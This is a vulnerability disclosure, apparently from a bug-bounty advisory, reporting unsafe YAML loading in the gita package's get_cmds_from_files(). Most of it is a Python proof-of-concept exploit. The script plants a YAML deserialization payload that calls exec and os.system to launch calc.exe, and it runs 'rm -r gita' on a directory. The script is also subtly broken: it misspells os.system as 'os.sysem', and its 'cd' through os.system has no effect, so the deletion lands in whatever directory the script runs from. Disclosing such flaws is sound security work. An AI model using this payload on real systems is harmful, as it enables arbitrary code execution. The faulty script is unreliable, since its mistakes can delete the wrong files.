gita

vulnerability arbitrary code execution
severity 3.8
language python
registry pypi

✍️ Description

gita helps to Manage multiple git repos with sanity.

  • Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading.

🕵️‍♂️ Proof of Concept

# vulnerable part of code
yaml.load() in get_cmds_from_files()

https://github.com/nosarthur/gita/blob/master/gita/utils.py#L236
https://github.com/nosarthur/gita/blob/master/gita/utils.py#L244
# exploit.py
import os
os.sysem('pip3 install gita')
from gita.utils import get_cmds_from_files
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('calc.exe')"
"""
os.system("cd ~/.config")
os.system('rm -r gita')
os.system("mkdir gita")
os.chdir("gita")
open('cmds.yml','w+').write(payload)
get_cmds_from_files()
print("calc has been poped -> Arbitrary Code Execution")

gita_pc

References